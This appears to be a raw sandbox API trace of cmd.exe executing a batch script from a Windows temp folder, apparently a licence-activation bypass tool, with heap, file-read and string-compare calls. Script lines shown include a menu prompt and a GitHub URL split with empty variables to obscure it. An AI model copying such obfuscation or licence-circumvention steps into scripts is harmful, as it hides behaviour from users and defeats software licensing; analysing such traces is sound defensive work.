0x19a8f21f120 [0179.428] GetProcessHeap () returned 0x19a8f1e0000 [0179.428] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x1a) returned 0x19a8f1f0150 [0179.428] GetProcessHeap () returned 0x19a8f1e0000 [0179.428] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x90) returned 0x19a8f202240 [0179.428] _get_osfhandle (_FileHandle=3) returned 0xa0 [0179.428] SetFilePointer (in: hFile=0xa0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1cd4 [0179.428] ReadFile (in: hFile=0xa0, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x43f9efe6e0, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe6e0*=0x1fff, lpOverlapped=0x0) returned 1 [0179.428] SetFilePointer (in: hFile=0xa0, lDistanceToMove=7397, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1ce5 [0179.429] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="choice /C:10 /N\r\n", cbMultiByte=17, lpWideCharStr=0x7ff7bd7209e0, cchWideChar=8191 | out: lpWideCharStr="choice /C:10 /N\r\neen% \"Enter a menu option in the Keyboard [1,0] :\"\r\nfind \"127.69.%masver%\" %nul1% || set old=1))\r\n=======================\r\n") returned 17 [0179.429] _get_osfhandle (_FileHandle=3) returned 0xa0 [0179.429] GetFileType (hFile=0xa0) returned 0x1 [0179.429] _get_osfhandle (_FileHandle=3) returned 0xa0 [0179.429] SetFilePointer (in: hFile=0xa0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1ce5 [0179.429] GetProcessHeap () returned 0x19a8f1e0000 [0179.429] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f206860 [0179.429] GetProcessHeap () returned 0x19a8f1e0000 [0179.430] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f206860) returned 1 [0179.430] GetProcessHeap () returned 0x19a8f1e0000 [0179.430] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f21f4e0 [0179.430] _wcsicmp (_String1="FOR", _String2="choice") returned 3 [0179.430] _wcsicmp (_String1="FOR/?", _String2="choice") returned 3 [0179.430] _wcsicmp (_String1="IF", _String2="choice") returned 6 [0179.430] _wcsicmp (_String1="IF/?", _String2="choice") returned 6 [0179.430] _wcsicmp (_String1="REM", _String2="choice") returned 15 [0179.430] _wcsicmp (_String1="REM/?", _String2="choice") returned 15 [0179.430] GetProcessHeap () returned 0x19a8f1e0000 [0179.430] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f21f060 [0179.430] GetProcessHeap () returned 0x19a8f1e0000 [0179.430] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x1e) returned 0x19a8f1f0330 [0179.430] GetProcessHeap () returned 0x19a8f1e0000 [0179.430] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x24) returned 0x19a8f1f02a0 [0179.431] _get_osfhandle (_FileHandle=3) returned 0xa0 [0179.431] SetFilePointer (in: hFile=0xa0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1ce5 [0179.431] ReadFile (in: hFile=0xa0, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x43f9efe6b0, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe6b0*=0x1fff, lpOverlapped=0x0) returned 1 [0179.431] SetFilePointer (in: hFile=0xa0, lDistanceToMove=7421, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1cfd [0179.431] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="if !errorlevel!==2 rem\r\n", cbMultiByte=24, lpWideCharStr=0x7ff7bd7209e0, cchWideChar=8191 | out: lpWideCharStr="if !errorlevel!==2 rem\r\nnter a menu option in the Keyboard [1,0] :\"\r\nfind \"127.69.%masver%\" %nul1% || set old=1))\r\n=======================\r\n") returned 24 [0179.431] _get_osfhandle (_FileHandle=3) returned 0xa0 [0179.431] GetFileType (hFile=0xa0) returned 0x1 [0179.431] _get_osfhandle (_FileHandle=3) returned 0xa0 [0179.431] SetFilePointer (in: hFile=0xa0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1cfd [0179.431] GetProcessHeap () returned 0x19a8f1e0000 [0179.431] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f206860 [0179.431] GetProcessHeap () returned 0x19a8f1e0000 [0179.433] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f206860) returned 1 [0179.433] GetProcessHeap () returned 0x19a8f1e0000 [0179.433] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f21fae0 [0179.433] _wcsicmp (_String1="FOR", _String2="if") returned -3 [0179.433] _wcsicmp (_String1="FOR/?", _String2="if") returned -3 [0179.433] _wcsicmp (_String1="IF", _String2="if") returned 0 [0179.433] _wcsicmp (_String1="IF/?", _String2="if") returned 47 [0179.433] GetProcessHeap () returned 0x19a8f1e0000 [0179.433] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f21fea0 [0179.433] GetProcessHeap () returned 0x19a8f1e0000 [0179.433] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x16) returned 0x19a8f1ecce0 [0179.433] GetProcessHeap () returned 0x19a8f1e0000 [0179.433] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x44) returned 0x19a8f1f9180 [0179.433] GetProcessHeap () returned 0x19a8f1e0000 [0179.433] RtlReAllocateHeap (Heap=0x19a8f1e0000, Flags=0x0, Ptr=0x19a8f1f9180, Size=0x2c) returned 0x19a8f1e0ff0 [0179.433] GetProcessHeap () returned 0x19a8f1e0000 [0179.433] RtlSizeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, MemoryPointer=0x19a8f1e0ff0) returned 0x2c [0179.433] _wcsicmp (_String1="!errorlevel!", _String2="/I") returned -14 [0179.433] GetProcessHeap () returned 0x19a8f1e0000 [0179.433] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f21f5a0 [0179.433] GetProcessHeap () returned 0x19a8f1e0000 [0179.433] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x2a) returned 0x19a8f1e08b0 [0179.433] _wcsicmp (_String1="ERRORLEVEL", _String2="!errorlevel!") returned 68 [0179.433] _wcsicmp (_String1="EXIST", _String2="!errorlevel!") returned 68 [0179.433] _wcsicmp (_String1="CMDEXTVERSION", _String2="!errorlevel!") returned 66 [0179.433] _wcsicmp (_String1="DEFINED", _String2="!errorlevel!") returned 67 [0179.433] _wcsicmp (_String1="NOT", _String2="!errorlevel!") returned 77 [0179.433] GetProcessHeap () returned 0x19a8f1e0000 [0179.434] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x2a) returned 0x19a8f1e0bf0 [0179.434] GetProcessHeap () returned 0x19a8f1e0000 [0179.434] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x14) returned 0x19a8f1ecd80 [0179.434] _wcsicmp (_String1="rem", _String2=")") returned 73 [0179.434] _wcsicmp (_String1="FOR", _String2="rem") returned -12 [0179.434] _wcsicmp (_String1="FOR/?", _String2="rem") returned -12 [0179.434] _wcsicmp (_String1="IF", _String2="rem") returned -9 [0179.434] _wcsicmp (_String1="IF/?", _String2="rem") returned -9 [0179.434] _wcsicmp (_String1="REM", _String2="rem") returned 0 [0179.434] _wcsicmp (_String1="REM/?", _String2="rem") returned 47 [0179.434] GetProcessHeap () returned 0x19a8f1e0000 [0179.434] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f220320 [0179.434] GetProcessHeap () returned 0x19a8f1e0000 [0179.434] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x18) returned 0x19a8f1ec820 [0179.434] GetProcessHeap () returned 0x19a8f1e0000 [0179.434] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x18) returned 0x19a8f1ec9c0 [0179.434] GetProcessHeap () returned 0x19a8f1e0000 [0179.434] RtlReAllocateHeap (Heap=0x19a8f1e0000, Flags=0x0, Ptr=0x19a8f1ec9c0, Size=0x14) returned 0x19a8f1ecd40 [0179.434] GetProcessHeap () returned 0x19a8f1e0000 [0179.434] RtlSizeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, MemoryPointer=0x19a8f1ecd40) returned 0x14 [0179.434] _wcsicmp (_String1="ELSE", _String2="\n") returned 91 [0179.434] _get_osfhandle (_FileHandle=3) returned 0xa0 [0179.434] SetFilePointer (in: hFile=0xa0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1cfd [0179.435] ReadFile (in: hFile=0xa0, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x43f9efe680, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe680*=0x1fff, lpOverlapped=0x0) returned 1 [0179.435] SetFilePointer (in: hFile=0xa0, lDistanceToMove=7541, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1d75 [0179.435] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="if !errorlevel!==1 (start ht%-%tps://github.com/mass%-%gravel/Microsoft-Acti%-%vation-Scripts & start %mas% & exit /b)\r\n", cbMultiByte=120, lpWideCharStr=0x7ff7bd7209e0, cchWideChar=8191 | out: lpWideCharStr="if !errorlevel!==1 (start ht%-%tps://github.com/mass%-%gravel/Microsoft-Acti%-%vation-Scripts & start %mas% & exit /b)\r\n==================\r\n") returned 120 [0179.435] _get_osfhandle (_FileHandle=3) returned 0xa0 [0179.435] GetFileType (hFile=0xa0) returned 0x1 [0179.435] _get_osfhandle (_FileHandle=3) returned 0xa0 [0179.435] SetFilePointer (in: hFile=0xa0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1d75 [0179.435] GetProcessHeap () returned 0x19a8f1e0000 [0179.435] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f206860 [0179.435] GetProcessHeap () returned 0x19a8f1e0000 [0179.435] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4010) returned 0x19a8f216d90 [0179.435] GetProcessHeap () returned 0x19a8f1e0000 [0179.435] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x14) returned 0x19a8f1ec6c0 [0179.435] GetEnvironmentVariableW (in: lpName="-", lpBuffer=0x7ff7bd7296a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0179.435] _wcsicmp (_String1="-", _String2="CD") returned -54 [0179.436] _wcsicmp (_String1="-", _String2="ERRORLEVEL") returned -56 [0179.436] _wcsicmp (_String1="-", _String2="CMDEXTVERSION") returned -54 [0179.436] _wcsicmp (_String1="-", _String2="CMDCMDLINE") returned -54 [0179.436] _wcsicmp (_String1="-", _String2="DATE") returned -55 [0179.436] _wcsicmp (_String1="-", _String2="TIME") returned -71 [0179.436] _wcsicmp (_String1="-", _String2="RANDOM") returned -69 [0179.436] _wcsicmp (_String1="-", _String2="HIGHESTNUMANODENUMBER") returned -59 [0179.436] GetProcessHeap () returned 0x19a8f1e0000 [0179.436] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ec6c0) returned 1 [0179.436] GetProcessHeap () returned 0x19a8f1e0000 [0179.437] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f216d90) returned 1 [0179.438] GetProcessHeap () returned 0x19a8f1e0000 [0179.438] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4010) returned 0x19a8f216d90 [0179.438] GetProcessHeap () returned 0x19a8f1e0000 [0179.438] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x14) returned 0x19a8f1ec780 [0179.438] GetEnvironmentVariableW (in: lpName="-", lpBuffer=0x7ff7bd7296a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0179.438] _wcsicmp (_String1="-", _String2="CD") returned -54 [0179.438] _wcsicmp (_String1="-", _String2="ERRORLEVEL") returned -56 [0179.438] _wcsicmp (_String1="-", _String2="CMDEXTVERSION") returned -54 [0179.438] _wcsicmp (_String1="-", _String2="CMDCMDLINE") returned -54 [0179.438] _wcsicmp (_String1="-", _String2="DATE") returned -55 [0179.438] _wcsicmp (_String1="-", _String2="TIME") returned -71 [0179.438] _wcsicmp (_String1="-", _String2="RANDOM") returned -69 [0179.438] _wcsicmp (_String1="-", _String2="HIGHESTNUMANODENUMBER") returned -59 [0179.438] GetProcessHeap () returned 0x19a8f1e0000 [0179.438] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ec780) returned 1 [0179.438] GetProcessHeap () returned 0x19a8f1e0000 [0179.440] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f216d90) returned 1 [0179.440] GetProcessHeap () returned 0x19a8f1e0000 [0179.440] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4010) returned 0x19a8f216d90 [0179.441] GetProcessHeap () returned 0x19a8f1e0000 [0179.441] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x14) returned 0x19a8f1ecde0 [0179.441] GetEnvironmentVariableW (in: lpName="-", lpBuffer=0x7ff7bd7296a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0179.441] _wcsicmp (_String1="-", _String2="CD") returned -54 [0179.441] _wcsicmp (_String1="-", _String2="ERRORLEVEL") returned -56 [0179.441] _wcsicmp (_String1="-", _String2="CMDEXTVERSION") returned -54 [0179.441] _wcsicmp (_String1="-", _String2="CMDCMDLINE") returned -54 [0179.441] _wcsicmp (_String1="-", _String2="DATE") returned -55 [0179.441] _wcsicmp (_String1="-", _String2="TIME") returned -71 [0179.441] _wcsicmp (_String1="-", _String2="RANDOM") returned -69 [0179.442] _wcsicmp (_String1="-", _String2="HIGHESTNUMANODENUMBER") returned -59 [0179.442] GetProcessHeap () returned 0x19a8f1e0000 [0179.442] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ecde0) returned 1 [0179.442] GetProcessHeap () returned 0x19a8f1e0000 [0179.443] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f216d90) returned 1 [0179.443] GetProcessHeap () returned 0x19a8f1e0000 [0179.443] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4010) returned 0x19a8f216d90 [0179.444] GetProcessHeap () returned 0x19a8f1e0000 [0179.444] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x18) returned 0x19a8f1ecb60 [0179.444] GetEnvironmentVariableW (in: lpName="mas", lpBuffer=0x7ff7bd7296a0, nSize=0x2000 | out: lpBuffer="") returned 0x16 [0179.444] GetProcessHeap () returned 0x19a8f1e0000 [0179.444] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ecb60) returned 1 [0179.444] GetProcessHeap () returned 0x19a8f1e0000 [0179.445] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f216d90) returned 1 [0179.445] GetProcessHeap () returned 0x19a8f1e0000 [0179.445] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f206860) returned 1 [0179.446] GetProcessHeap () returned 0x19a8f1e0000 [0179.446] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f21ee20 [0179.446] _wcsicmp (_String1="FOR", _String2="if") returned -3 [0179.446] _wcsicmp (_String1="FOR/?", _String2="if") returned -3 [0179.446] _wcsicmp (_String1="IF", _String2="if") returned 0 [0179.446] _wcsicmp (_String1="IF/?", _String2="if") returned 47 [0179.446] GetProcessHeap () returned 0x19a8f1e0000 [0179.446] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f2207a0 [0179.446] GetProcessHeap () returned 0x19a8f1e0000 [0179.446] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x16) returned 0x19a8f1ec920 [0179.446] GetProcessHeap () returned 0x19a8f1e0000 [0179.446] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x44) returned 0x19a8f1f9310 [0179.446] GetProcessHeap () returned 0x19a8f1e0000 [0179.446] RtlReAllocateHeap (Heap=0x19a8f1e0000, Flags=0x0, Ptr=0x19a8f1f9310, Size=0x2c) returned 0x19a8f1e08f0 [0179.446] GetProcessHeap () returned 0x19a8f1e0000 [0179.446] RtlSizeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, MemoryPointer=0x19a8f1e08f0) returned 0x2c [0179.446] _wcsicmp (_String1="!errorlevel!", _String2="/I") returned -14 [0179.446] GetProcessHeap () returned 0x19a8f1e0000 [0179.446] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f21f420 [0179.446] GetProcessHeap () returned 0x19a8f1e0000 [0179.446] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x2a) returned 0x19a8f1e0d70 [0179.446] _wcsicmp (_String1="ERRORLEVEL", _String2="!errorlevel!") returned 68 [0179.446] _wcsicmp (_String1="EXIST", _String2="!errorlevel!") returned 68 [0179.446] _wcsicmp (_String1="CMDEXTVERSION", _String2="!errorlevel!") returned 66 [0179.446] _wcsicmp (_String1="DEFINED", _String2="!errorlevel!") returned 67 [0179.447] _wcsicmp (_String1="NOT", _String2="!errorlevel!") returned 77 [0179.447] GetProcessHeap () returned 0x19a8f1e0000 [0179.447] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x2a) returned 0x19a8f1e0e70 [0179.447] GetProcessHeap () returned 0x19a8f1e0000 [0179.447] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x14) returned 0x19a8f1ec9c0 [0179.447] GetProcessHeap () returned 0x19a8f1e0000 [0179.447] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f2203e0 [0179.447] _wcsicmp (_String1="FOR", _String2="start") returned -13 [0179.447] _wcsicmp (_String1="FOR/?", _String2="start") returned -13 [0179.447] _wcsicmp (_String1="IF", _String2="start") returned -10 [0179.447] _wcsicmp (_String1="IF/?", _String2="start") returned -10 [0179.447] _wcsicmp (_String1="REM", _String2="start") returned -1 [0179.447] _wcsicmp (_String1="REM/?", _String2="start") returned -1 [0179.447] GetProcessHeap () returned 0x19a8f1e0000 [0179.447] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f220b60 [0179.447] GetProcessHeap () returned 0x19a8f1e0000 [0179.447] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x1c) returned 0x19a8f1eff70 [0179.447] GetProcessHeap () returned 0x19a8f1e0000 [0179.447] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x8a) returned 0x19a8f202060 [0179.447] GetProcessHeap () returned 0x19a8f1e0000 [0179.447] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f21efa0 [0179.447] _wcsicmp (_String1="FOR", _String2="start") returned -13 [0179.447] _wcsicmp (_String1="FOR/?", _String2="start") returned -13 [0179.447] _wcsicmp (_String1="IF", _String2="start") returned -10 [0179.447] _wcsicmp (_String1="IF/?", _String2="start") returned -10 [0179.448] _wcsicmp (_String1="REM", _String2="start") returned -1 [0179.448] _wcsicmp (_String1="REM/?", _String2="start") returned -1 [0179.448] GetProcessHeap () returned 0x19a8f1e0000 [0179.448] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f2204a0 [0179.448] GetProcessHeap () returned 0x19a8f1e0000 [0179.448] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x1c) returned 0x19a8f1efee0 [0179.448] GetProcessHeap () returned 0x19a8f1e0000 [0179.448] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x42) returned 0x19a8f1f9310 [0179.448] GetProcessHeap () returned 0x19a8f1e0000 [0179.448] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f21f660 [0179.448] _wcsicmp (_String1="FOR", _String2="exit") returned 1 [0179.448] _wcsicmp (_String1="FOR/?", _String2="exit") returned 1 [0179.448] _wcsicmp (_String1="IF", _String2="exit") returned 4 [0179.448] _wcsicmp (_String1="IF/?", _String2="exit") returned 4 [0179.448] _wcsicmp (_String1="REM", _String2="exit") returned 13 [0179.448] _wcsicmp (_String1="REM/?", _String2="exit") returned 13 [0179.448] GetProcessHeap () returned 0x19a8f1e0000 [0179.448] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f21f1e0 [0179.448] GetProcessHeap () returned 0x19a8f1e0000 [0179.448] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x1a) returned 0x19a8f1f0090 [0179.448] GetProcessHeap () returned 0x19a8f1e0000 [0179.448] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x18) returned 0x19a8f1ec6e0 [0179.448] _wcsicmp (_String1="ELSE", _String2="\n") returned 91 [0179.449] _get_osfhandle (_FileHandle=3) returned 0xa0 [0179.449] SetFilePointer (in: hFile=0xa0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1d75 [0179.449] ReadFile (in: hFile=0xa0, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x43f9efe650, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe650*=0x1fff, lpOverlapped=0x0) returned 1 [0179.449] SetFilePointer (in: hFile=0xa0, lDistanceToMove=7544, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1d78 [0179.449] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=")\r\n", cbMultiByte=3, lpWideCharStr=0x7ff7bd7209e0, cchWideChar=8191 | out: lpWideCharStr=")\r\n!errorlevel!==1 (start ht%-%tps://github.com/mass%-%gravel/Microsoft-Acti%-%vation-Scripts & start %mas% & exit /b)\r\n==================\r\n") returned 3 [0179.449] _get_osfhandle (_FileHandle=3) returned 0xa0 [0179.449] GetFileType (hFile=0xa0) returned 0x1 [0179.449] _get_osfhandle (_FileHandle=3) returned 0xa0 [0179.449] SetFilePointer (in: hFile=0xa0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1d78 [0179.449] GetProcessHeap () returned 0x19a8f1e0000 [0179.449] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f206860 [0179.450] GetProcessHeap () returned 0x19a8f1e0000 [0179.450] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f206860) returned 1 [0179.450] _wcsicmp (_String1="ELSE", _String2="\n") returned 91 [0179.450] _get_osfhandle (_FileHandle=3) returned 0xa0 [0179.450] SetFilePointer (in: hFile=0xa0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1d78 [0179.451] ReadFile (in: hFile=0xa0, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x43f9efea10, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efea10*=0x1fff, lpOverlapped=0x0) returned 1 [0179.451] SetFilePointer (in: hFile=0xa0, lDistanceToMove=7547, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1d7b [0179.451] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=")\r\n", cbMultiByte=3, lpWideCharStr=0x7ff7bd7209e0, cchWideChar=8191 | out: lpWideCharStr=")\r\n!errorlevel!==1 (start ht%-%tps://github.com/mass%-%gravel/Microsoft-Acti%-%vation-Scripts & start %mas% & exit /b)\r\n==================\r\n") returned 3 [0179.451] _get_osfhandle (_FileHandle=3) returned 0xa0 [0179.451] GetFileType (hFile=0xa0) returned 0x1 [0179.451] _get_osfhandle (_FileHandle=3) returned 0xa0 [0179.451] SetFilePointer (in: hFile=0xa0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1d7b [0179.451] GetProcessHeap () returned 0x19a8f1e0000 [0179.451] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f206860 [0179.451] GetProcessHeap () returned 0x19a8f1e0000 [0179.452] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f206860) returned 1 [0179.452] _wcsicmp (_String1="ELSE", _String2="\n") returned 91 [0179.452] _tell (_FileHandle=3) returned 7547 [0179.452] _close (_FileHandle=3) returned 0 [0179.452] GetEnvironmentVariableW (in: lpName="old", lpBuffer=0x7ff7bd7296a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0179.452] _wcsicmp (_String1="old", _String2="CD") returned 12 [0179.452] _wcsicmp (_String1="old", _String2="ERRORLEVEL") returned 10 [0179.452] _wcsicmp (_String1="old", _String2="CMDEXTVERSION") returned 12 [0179.452] _wcsicmp (_String1="old", _String2="CMDCMDLINE") returned 12 [0179.452] _wcsicmp (_String1="old", _String2="DATE") returned 11 [0179.452] _wcsicmp (_String1="old", _String2="TIME") returned -5 [0179.452] _wcsicmp (_String1="old", _String2="RANDOM") returned -3 [0179.452] _wcsicmp (_String1="old", _String2="HIGHESTNUMANODENUMBER") returned 7 [0179.452] _get_osfhandle (_FileHandle=1) returned 0x24 [0179.452] SetConsoleMode (hConsoleHandle=0x24, dwMode=0x7) returned 1 [0179.453] _get_osfhandle (_FileHandle=1) returned 0x24 [0179.453] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x7ff7bd72960c | out: lpMode=0x7ff7bd72960c) returned 1 [0179.453] _get_osfhandle (_FileHandle=0) returned 0x20 [0179.453] GetConsoleMode (in: hConsoleHandle=0x20, lpMode=0x7ff7bd729608 | out: lpMode=0x7ff7bd729608) returned 1 [0179.455] SetConsoleInputExeNameW () returned 0x1 [0179.455] GetConsoleOutputCP () returned 0x1b5 [0179.455] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x7ff7bd729660 | out: lpCPInfo=0x7ff7bd729660) returned 1 [0179.455] SetThreadUILanguage (LangId=0x0) returned 0x409 [0179.455] CreateFileW (lpFileName="C:\\Windows\\Temp\\MAS_15344413.cmd" (normalized: "c:\\windows\\temp\\mas_15344413.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x43f9efeea0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0179.456] _open_osfhandle (_OSFileHandle=0xa0, _Flags=8) returned 3 [0179.456] _get_osfhandle (_FileHandle=3) returned 0xa0 [0179.456] SetFilePointer (in: hFile=0xa0, lDistanceToMove=7547, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1d7b [0179.456] GetProcessHeap () returned 0x19a8f1e0000 [0179.456] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ec6e0) returned 1 [0179.456] GetProcessHeap () returned 0x19a8f1e0000 [0179.456] RtlFreeHeap (HeapHandle=0x19a8f1e0000, 